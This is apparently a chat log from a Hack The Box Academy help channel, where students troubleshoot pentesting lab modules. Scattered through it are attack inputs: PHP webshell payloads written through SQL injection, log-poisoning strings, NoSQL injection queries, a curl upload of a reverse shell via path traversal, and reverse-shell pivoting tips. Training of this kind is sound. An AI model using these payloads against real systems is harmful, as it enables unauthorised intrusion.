And given the history of stuff like mathematics, using someone like Einstein is basically one of the worst possible examples.
The mathematical field is filled with people who are basically geniuses, and using them as "motivation" is just awful.
John Nash: https://imgur.com/sMqfqU6
Hey guys can anyone please help me with the Exploiting Thick Client Applications module, I cannot get it to download the server
You don't want to read about Terence Tao's "advice" for grad school.
It starts on page 96.
There's a reddit thread about this: https://www.reddit.com/r/math/comments/c6a5vo/til_that_terence_tao_struggled_to_pass_his
"I struggled on my orals exam for grad school because I spent a lot of time gaming. I decided to cut back on gaming and studied for two weeks. Oh yeah, you should cut me some slack - I was only 21."
I think it's pretty bad to mention Freud in all of this, the founder of "everything is a phallic symbol and we all want to fuck one of our parents"
you're in the right path partly
try other zones
what zones did inlanefreight.htb itself give you?
but you have other zones also
you've to brute force then
Not every zone allows zonetransfer from everyone
@vital adder could you help me with this module please, been at it for days
hi guys i have a really dumb question. im editing the nginx config for the reverse proxy and AJP. it says comment out the server block in the nginx.conf file but i'm after confusing myself and not sure what they mean by block and where to edit the config. by block do they mean everything that is between the brackets {} with the server title, and do i just add the upstream tomcats and the 8080 server within the http {}
Can someone that's done the broken auth skill assessment confirm something for me? i'm like 99% positive I've got the correct cookie but everytime I enter it in Dev tools and refresh i get user cannot have requested role and through burp it just gets sanitized and replaced with the original cookie if i try that way.
? through burp repeater ?
Can someone that's done the broken auth skill assessment confirm something for me? i'm like 99% positive I've got the correct cookie but everytime I enter it in Dev tools and refresh i get user cannot have requested role and through burp it just gets sanitized and replaced with the original cookie if i try that way. 😄
Im confused is asking for confirmation not a question
Sorry, before I wrote my message, I had obviously copied your message and pasted that. 🤣
This is what happens when you press around on your cell phone with sausage fingers 🤣🤣
Send me the username and role and i have a look at it
Guys any help in the windows logs mini module in the part of the Get-WinEvent exercise, i'm stuck
sure shoot me a dm if you still need help
#!/bin/bash

# Count number of characters in a variable:
# echo $variable | wc -c

# Variable to encode
var="nef892na9s1p9asn2aJs71nIsm"
counter=0

for counter in {1..40}
do
    var=$(echo "$var" | base64)
done

if [ $counter -eq 35 ]
then
    echo $var | wc -c
fi
Hello guys can any of you help me with this exercise of the bash scripting module? A hint or something to give some light would be helpful, because I don't understand why it tells me that there is an error in the code that was actually given by the academy. In the line of the for loop it says illegal number on the range and I don't get it. I also checked the code in shellcheck.net and it doesn't say that there are any mistakes
Thank you in advance!
could you put the "if" statement inside the for loop?
I tried that first but then it said expected do as the error
do it one more time with proper indentation
in any case this is something you want to use:
https://www.shellcheck.net/
ShellCheck finds bugs in your shell scripts
Ok I will try and let you know, thanks for answering!!
Yeah i used shellcheck but in there all was good😅
outside the for loop the "counter" will hold the value 40, put the "if" statement inside and dm me in case you have further problems with the script
Ok I'm on it now, thanks a lot!! Will do
I think if the user is unsure about http-server and npm being connected they could just do a locate http-server | grep npm displaying the paths where http-server is located and filtering them to know if they are linked with npm.. it should provide with some results given that as any npm package, http-server should have a file named ".npmignore" too, so the grep will display those.. from that the user will see that http-server is a subdirectory of "node_modules".. so I think that would be reasonable to consider as a connection, thus being sure that http-server is indeed the command you are expected to provide in your answer
I did it via RDP however something you can try is to load the script directly in memory with the -s option along with the script file path where you have stored the script on your local machine. Look at the man page evil-winrm -h
thats the evil-winrm flag?
ok
look at the man page
ill try that
I'm on the nmap module and at the bottom I have the question: + 1 Find all TCP ports on your target. Submit the total number of found TCP ports as the answer. However none of the scans I try return anything promising. Did I miss something?
@rustic sage 'Host and Port Scanning'
is the one I'm on.
I'm not sure myself, but the command you've provided listens on 0.0.0.0 by default. So, I believe your primary IP assigned should work.
Like a usual nc command or it'll fail trying to route.
You can give it a try and see what happens
catching connections?
The done command should be at the end of the control structure in your script
Think about it this way, how does the bridge machine know how to get back to your host?
Yeah, it's failing trying to route.
Btw, curious. Why are you running proxychains on nc?
but idk how to do it with my machine
I used 10.10.x.x for the revshell
maybe I can start a revshell in the bridge
but does that machine actually know where 10.10.x.x is?
and from there start a nc to my vm
oh I meant the actual machine you're going after, I'm assuming the setup is something like
ATTACKER (10.10.x.x) <---> BRIDGE (10.10.x.x/172.16.x.x) <---> OTHER_BOX (172.16.x.x)
that box on the internal network just does not know where a 10.10.x.x IP will be because it's not configured to know where that is
the if condition in your script checks whether it is equal to 35 after the loop ends
To fix it -
    var=$(echo "$var" | base64)
    if [ $counter -eq 35 ]
    then
        echo $var | wc -c
    fi
done
I understand u, I will just do it setting the nc in the bridge then.
If you wanted a reverse shell to go all the way back to your box, you'd need something running on the Bridge/Jump box to tunnel traffic between the two, like socat.
I had socat at the beginning
yesterday, but I just saved the .ssh from the root
to continue today and do it faster
Just to be clear, I'm not saying to catch the reverse shell with socat, socat can specifically be used to explicitly forward traffic from one port to another IP and port
yea it makes a tunnel
like ligolo-ng
Yes I did, for example…
ipaddress:port/?q=%7B%22name%22%3A%7B%22%24ne%22%3A%22doesntExist%22%7D%7D
Ive tried every command provided in the section
Hey everyone, I am stuck on the Getting Started Knowledge Check. For some reason the metasploit module return failed to retrieve nonce and I've now spent almost an hour trying to decipher the code and why this happens to no avail. Is this some bug on the box or I am being misdirected?
Hey has someone done the KERBEROS ATTACKS module and completed the Unconstrained Delegation questions? having a hard time with the second question
ty I got system in the other machine as well
@rustic sage no
Check out then say
i did
and still no
It has nothing to do with HTB Academy modules. Authenticate with the bot, then you will have more relevant channels you can post in
@novel matrix how i get roles of hackthebox
verify in the bot commands channel: /identify with the api token on your profile page
anybody understand bash? im getting syntax error near unexpected token '>'. i have tried in the terminal and i have put it in a file called script.sh and gave it 777, ran ./script.sh and same error.
i cant actualy past the function here tho 😂
its 4 keys
@vocal tusk show the code
i cant paste it some form of mystical protection
and cant post a screenshot of it either
at the very end the bash script for automation is literally a copy and paste job and won't work
Has anyone completed the CrackMapExec Skills Assessment? I could use a hand with the 3rd question regarding DEV01. Fully pwned SQL01 and have a number of creds, including the one I believe should lead to pwning the DEV box, but I must be missing something and a second pair of eyes would be great. Thanks!
i sent you dm with script
it just wont work, its supposed to encode the command and pass it to the server with a curl command so i can use special characters
@vocal tusk ok
Read and follow #welcome
After the verification of your user, you can upload images
Check the creds you found against the SMB on DC01.
Check out the rights
thank you i will now
Footprinting Lab - Hard, I’m getting an invalid format for Tom after copying the OpenSSH Private key over. When trying to connect via ssh I’m getting an invalid format and permission denied (publickey). Help anyone?
Try it as shown in the previous lesson
I took advantage of the write perm to land a callback and cracked it but doesn't seem to lead me into the DEV box.
Do you have the creds from user j***
Yep.
Check ||Group Managed Service Accounts||
What kind of problem do you have?
im trying to do Firewall and IDS/IPS Evasion - Hard Lab but when i try to scan it with the different firewall evasion flags that i learnt before i cant see the required port, i only see 2 of them
make sure you didn't miss any lines or copied extra new-lines or these kinda things. if it keeps failing feel free to dm me and I'll take a closer look
i think i broke it it just says please wait for the last half hour almost after i followed steps 😂
Waiting is good. Drink coffee or tea 🤣
Or ask a moderator/administrator
i'll try turning it off and on again 😂
Im trying no dns resolution, no ICMP ping, ACK scan and custom source port but i cant see the port with the service version required
The module shows you another possibility instead of nmap. Try it with this.
ill try! thx!
yes dont bother, only way i managed to maintain a system shell over that was through the exploit
should have enough information to pivot to the next host if you have already obtained the admin hash
just wondering where i would add the payload in this command SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE
is the <?php echo shell_exec($_GET['c']);?> bit the payload
cuz i need to add base64 and idk where it goes
someone know how to delete the data from bloodhound?
Bottom left there are 4 buttons. Clear database, Refresh stats etc.
There should be some kind of settings to auto-delete upon closing the app cuz it's getting annoying everytime
getting Parse error: syntax error, unexpected 'JABjAGwAaQBlAG4AdAAgAD0AIABOAG' (T_STRING), expecting ')' in C:\xampp\htdocs\webshells.php on when trying to get a shell
this is what i entered to make the webshell SELECT "<?php echo shell_exec(powershell -e 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);?>" INTO OUTFILE 'c://xampp/htdocs/webshells.php';
The web server is running PHP.
Just write the webshell into the webroot and call it.
It does not need a powershell
is there a way to force use my keyboard?
it's annoying sometimes when u connect to the target and my keys are in a different place and instead of writing / it writes &
You can change the language to your own language
Then the keyboard should be right again
I have put the shell in a folder on the website using SQLi but I cannot seem to run the php code
I put it in /tmp/ named /shell.php
how do i run it from there? I dont have access to upload a file to /var/www/html
In /tmp a web server actually never runs and therefore no PHP can be executed there.
Where should i put it then
I think /etc works as well but idk how to get it to execute on the server
No, you always have to write a webshell into the directory where the webserver runs
Anyone ever run into this error on Crackmapexec (Module: Using Crackmapexec)
But I dont have permission xd
etc is certainly also wrong
Probably /var/.../...
Hi, I am trying to finish the Security Monitoring & SIEM Fundamentals module and in the second question of the SIEM Visualization Example 2 section I am unable to answer it. I have looked all over the Elastic Stack and the answers I provide do not work. It would be greatly appreciated if someone could shed some light on the issue. This is the last question I have left to answer. Thank you very much !
having trouble setting up the reverse shell
ive got a web shell
but when i use a powershell 3 base64 payload i get this
Yes it is, but I dont have permissions to upload a file there
did you url encode the payload?
i dont think so lol
how would i do that?
like just need to replace the spaces with + in this case.
oh
Help, I am stuck on the Skill Assessment in SQL injections fundamentals
The Attacking Enterprise Networks module is being amazing
Are you still getting the same help menu output from powershell?
I guess the command got executed, have your listening IP and ports verified once again.
both on the listener and on the payload.
You don't give 0.0.0.0 in the payload. It's kind of like a default route that sends traffic to itself in this case.
do i need to add my local ip?
You need to specify the ip address of your HTB VPN Interface which would be the tunX IP.
your ip assigned through academy vpn.
Module: Attacking Common Applications
Section: Gitlab - Discovery & Enumeration
I have found gitlab's version but it doesn't work when I submit it. I got the same ||13.10|| with/without registration so I think something is not right here.
stuck on ad enumeration/dcsync section. i'm trying to use getuserspns_windows.exe but it keeps saying that i am providing it too few arguments. here is my command. PS C:\Tools> .\GetUserSPNs_windows.exe -target-domain INLANEFREIGHT.LOCAL -dc-ip 172.16.5.5 -request-user INLANEFREIGHT\syncron -request. what am i missing? hard time finding an example online
what would be safer:
start a smbserver from my vm or use xfreerdp /drive
I wonder can we host an smbserver on a Kubernetes ssl nft ?
ngl they could've just gone to thm instead and been hand held to top 0.00001%
safer or reliable?
xfreerdp is safer and smbserver is reliable
safer, in case they notice. which one of them would be better to protect my files
anyone can help me with the LFI module with the final task? "Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer."
what have u tried
i found the admin panel and i try poisoning log, but didn't work
Iirc, when you mount a drive through xfreerdp, only you can see it. Even if someone had a session on the machine, they wouldn't be able to see your drive mounted.
oh I thought anyone could use it
I stopped doing thm at top 0.069% 
checking 'net use'
i barely use thm and i'm like 5%, makes u wonder what the other 95% of people are doing
I am top 0.1% and I just used it for 1 month
can anyone help me?
youre on the correct path. you just need to keep trying and thinking about your payloads
remember the issues with log poisoning is you can brick the page. So if you have a bad payload you basically have to reset the lab
you can also read the error.log to see the error message for your payload
i used <?php system($_GET["cmd"]); ?> in user agent
Its a skill assessment, Ive given all the tips I can for it
you must ultimately pass this challenge yourself
Take a look at the log file.
i found access.log
is there any reason the medium lab for attacking common services is infinitely easier than the easy lab?
my log poisoning didn't work 😭
yesh
Cough cough (Skill assessment - SQLi)
Ive been stuck for 2 hours
I cant find the file I am supposed to upload the thing to
me too, but with the final LFI task
Take a close look at the logfile and then consider what happens if you use your payload the way you do.
F, but its so hard to find the place I can execute the code
Hi guys, I'm stuck at the burp intruder question on using web proxies, I'm supposed to fuzz the target on the admin directory appending .html. Just wanna know if I'm on the right path here
Q:Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag
Without looking at my notes now. The path looks good, but remember that your list must have .html with each entry.
Depending on the list it is better to define the file extension here in burp
try the shortest lists first
return error 404 when i use the payload
I append a suffix .html but I'm really not used to fuzzing. So I don't know if the problem is to wait to run the whole wordlist or if my request is wrong
Then something is wrong anyway.
Look at the chapter again, look at the logfile and think about why your payload does not work
read what I told
I know. I gave you advice on how you can debug it.
As I said, it depends on your list.
The important thing is that you scan for html files.
like this:
||/admin/abc123.html||
idk shortest is shortest lol
which one is shorter the mutated list or the default list
i try everything, but i couldn't do this task
I'm using the one suggested in the exercise, by seeing your example i believe the request is right
wait time
Look at the ||quotation marks||
"-" "
Then you should change your strategy 😉
cause u want
I told u 4 times already to use the shortest list
the module gives the wordlists
There's nothing wrong with that either.
Even with this u sent here
rushing through sections/modules is not recommended, understanding the information and the logic behind is recommended
the first comment is from payloadbunny
which says to use the 2 wordlists they give in the section
having notes, and building up them will help you further along the path
Are you sure that the user is root?

why u use username list in password
in the forum u sent bunny told to use both list given in the section
there is 1 list called username.list and the other one password.list
How deep of a knowledge do we need to have for SQL? Just to be able to navigate around junior DBA type knowledge
You can never know enough.
I just got Domain Admin in the attacking enterprise networks
, but I couldn't do it all blindly
I couldn't do it all completely blindly either
it does
but what about 2nd domain? hue hue
and non-domain joined machines
DA is usually win, but not always
I thought I was done with domain admin
But seems I still need to continue 
can i get some help with the hard lab for attacking common services
how do i impersonate 'j'
There is a section which explains how to impersonate
With xp_cmdshell if I remember well
U working now as pentester?
Hes been purple/red team for awhile
so its got nothing to do with rdp?
i havent found the name of the server yet
wdym
I am on the nmap module and it tells me to : Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer. I've tried everything. Waiting on a UDP scan, but by the time its done my box will have been reset. I must have missed something. Anyone know what to do here?
check the listening ports in the rdp
Ive also asked in #1024429874246590575
wdym by this
what flags are you using?
any hint on what im meant to be looking for
@tidal mango I've used -sC -sV -p- together, but the rest of them separate. -A, -sU, -Pn
sql
Well it means ssh target does not support password auth
I'm not arguing
There are 2 ways to authenticate with ssh
Password and
...
theres technically more ways than that but you have to go out of your way to configure em
but yeah not unusual at all to disable ssh password auth. I think it may even be nist recommendation
I believe so
```
anywhere from which they have SSH access. However, if interactive users are required to remember and
manage different passwords for multiple systems, it can create administrative and security challenges.
Password authentication is generally not recommended for automated processes because it doesn’t
provide the level of access control available with other authentication methods, especially public key
authentication.
If password authentication is used for interactive users or automated access, the passwords should be
rotated frequently in accordance with the server organization’s password policy (which should also
contain requirements such as minimum password length, minimum password complexity, etc.)
```
password auth okay for reg users with some caution, and a no no for automated users
Dont have to worry about the password being weak or bruted if you dont accept password in the first place
@acoustic owl can you help me
easiest way to get help is to post your question
I did, they responded yesterday
and I responded back
but no response yet
But I'll post it again, maybe someone else can help. I'm stuck on the "In-Band Data Extraction" section of the "Introduction to NoSQL Injection"
As you said, you are currently in the Skill Assessment "Service Login" section.. so you should be trying to get access to a service, not trying to access a web server, given that the Skill Assessment "Website" is a different section than this one
In the "Service Auth Brute Forcing" section you will find some hints on how to approach this last Skill Assessment
Not exactly, in the first image you sent which is the description of the section, it says that you don't have infos about the website
It also says that you should determine if any weak credentials are used for website and other login services
In the 2nd image you sent it never even mentions a website at all, in fact they say: SSH to [IP] with user "" and password ""
Yes
Still, nobody said it has to be on the website
Otherwise you would have done it in the previous Skill Assessment, aka the one with "Website" in the name
Not here, where it says "Service login"
Read the hint of the 1st question
It should allow you to skip the 1st step of your thought process
Nice
I've never seen someone as excited to complete a module, that's cool.. is this your first one?
Can someone help me? Trying to dump this mongodb for the Introduction to NoSQL Injection module:
I've tried multiple commands and made sure to URL encode, nothing is working
how far have you gotten so far?
I'm trying this:
http://134.209.17.55:30232/index.php?q={"name":{"$regex":"^.*"}}
URL Encoded version:
http://134.209.17.55:30232/index.php?q={"name"%3A{"%24regex"%3A"^.*"}}
I've tried all of these too
ah I haven't done that one yet. I'll see if I have it unlocked and give it a shot.
is 500 cubes
aah I don't have enough cubes lol
Glad I saw that before I spent my hard earned cubes on it.
You could give the hacktricks page on NoSQL injection a shot? https://book.hacktricks.xyz/pentesting-web/nosql-injection
Does it ever show an error or anything?
no
Sounds like you aren't reading the module. Go back and reread it.
I got it already thanks
I was typing it wrong and thought it wasn't correct
So literally had doubts
But I got it already
Brother try a different approach. If ftp is open: try that first
If it can't auth that's a different error
Try. A different. Approach.
Also hydra supports ./(unknown) notation for wordlists
God that's painful

Yes. You should get used to typing out file paths and names manually (with tab autocomplete to assist)
Hi there,
I can help you with this, dm me.
You don't have to be a fast typer
That's rough but if you know where the start of your tree is I.e /home/{user}/SecLists/ then it's easy to branch
Rather than having to go back in a file browser
Also what would you do if you had to perform Said tasks on a machine in which you only have cli access to
No gui
A lot of the systems you remote into in the course don't have internet access
Also I tend to have academy open in a browser ,and notes, on my main os and stick to just using vm with mostly terminal or Firefox *if the box has a web interface
To keep clutter down you can drag them to the left or right of the screen to have them be half screened
Idk if kali lets you do the {windows} and arrow keys to move the windows around
If you don't actually organize your windows you're just causing yourself more headaches
Brother it's not a screen size issue
You're literally cramming everything towards the center
Yes something like that
Or if you're going to layer your windows make it so a "grab edge" is visible for you to click on
It's a process to learn it. And what works best in your workflow
But legit I had to learn proper work flow when I worked at a call center
Allowing me to tab between specific things, such as remote sessions, work tab, notes, etc
Also when you unclutter everything you can more easily see what you're looking at
Like when I'm working through an assessment or something i will write down the question(s) where I can see it
I like an approach like this where your terminals are slightly see through and you can see the questions. Also ctrl+shift+T is your friend. That opens new tabs in your terminal. This works better for me since I have the vertical real estate and don't have to scroll as much if it were quad screen.
hmm? you shouldn't need that
it's just a transparency setting in your terminal
lol your computer is plenty
you were using this setting?
maybe reset to factory defaults and try again
not sure
Transparency is a somewhat poor solution to a simple problem. Tiling WMs, and/or virtual desktop management are the real way to go.
yeah most (I think all) OSes now come with some built-in workspace feature. Much better than overlaying windows with transparency
it's just an additional suggestion. Tiling was already mentioned. He can take or leave w/e
he/she
Hello i am currently doing the Easy box for the Attacking common services modules. i am trying to put the reverse shell file on the root of the XAMPP app but no luck: i get a success message, but when i check the ftp server there is nothing there. here is the command i am using: curl -k -X PUT -H "Host: HostIP" --basic -u fioana:987654321 -F 'fileX=@/home/htb-ac-71408/bc.php' 'https://BOXIP/../../../../../..\xampp\htdocs\myshell.php'
yeah not sure what's going on there. For now just focus on tiling like Marcie suggested and creating tabs within the terminal. ctrl+shift+t
That should help you focus on testing instead of wrangling with windows and things.
I meant pentesting.
I'm right there with ya
it's a medium lab tho
There you go. 🙂
It not as hard as you might be leading yourself to believe
I don't do that on HTB, because I recall only one box where they intentionally did not link .bash_history to /dev/null
Oh, I'm not disagreeing with you here.
I just sort of find it funny that there is a lot of stuff you would basically not do on the main htb site just because of how the boxes are set up.
Honestly the way that modules are designed it is 75% of how lateral and vertical traversal happens. As in most real world cases, convenience over security
A lot of the boxes basically make you go "Ugh, this is a dumb design. It smells."
Not saying that it doesn't happen, but it's sort of funny just how many boxes would simply not have issues if they had just turned off logging in through ssh with passwords
This is straying off topic from the modules
Let's just keep it at "academy is only testing you on the module"
Challenges and boxes being released have no bearing on academy
Honestly, not trying to be mean, I would go back over the modules and see how much you can do/solve with just your notes. And add to your notes anything you need to re-look up